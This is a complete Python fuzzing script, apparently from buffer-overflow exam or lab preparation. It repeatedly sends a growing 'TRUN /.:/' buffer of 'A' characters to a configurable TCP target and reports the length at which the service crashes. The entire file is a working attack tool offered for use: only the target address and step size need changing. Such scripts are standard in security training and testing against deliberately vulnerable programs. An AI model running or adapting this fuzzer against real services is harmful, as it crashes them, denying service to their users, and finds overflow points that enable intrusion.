#!/usr/bin/python3

import sys, socket
from time import sleep

class bcolors:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'


print(f"""{bcolors.BLUE} {bcolors.BOLD}
                    ____
   ____  _____     / __/_  __________
  / __ \/ ___/    / /_/ / / /_  /_  /
 / / / / /__     / __/ /_/ / / /_/ /_
/_/ /_/\___/____/_/  \__,_/ /___/___/
          /_____/ {bcolors.GREEN}{bcolors.UNDERLINE}by abdellatif-dev
{bcolors.ENDC}""")


buffer_len = 1 # change this
buffer = "A" * buffer_len
target = ('127.0.0.1',9999) # change this

while True:
    try:
        payload = "TRUN /.:/" + buffer

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(target)
        print (f"{bcolors.BLUE}{bcolors.BOLD}[+] {bcolors.GREEN}Sending the payload...\n{bcolors.FAIL} {str(len(buffer))}")
        s.send((payload.encode()))
        s.close()
        sleep(1)
        buffer = buffer + "A"* buffer_len
    except:
        print (f"{bcolors.GREEN}{bcolors.BOLD}The fuzzing crashed at{bcolors.FAIL} {str(len(buffer))} bytes{bcolors.ENDC}" )
        sys.exit()
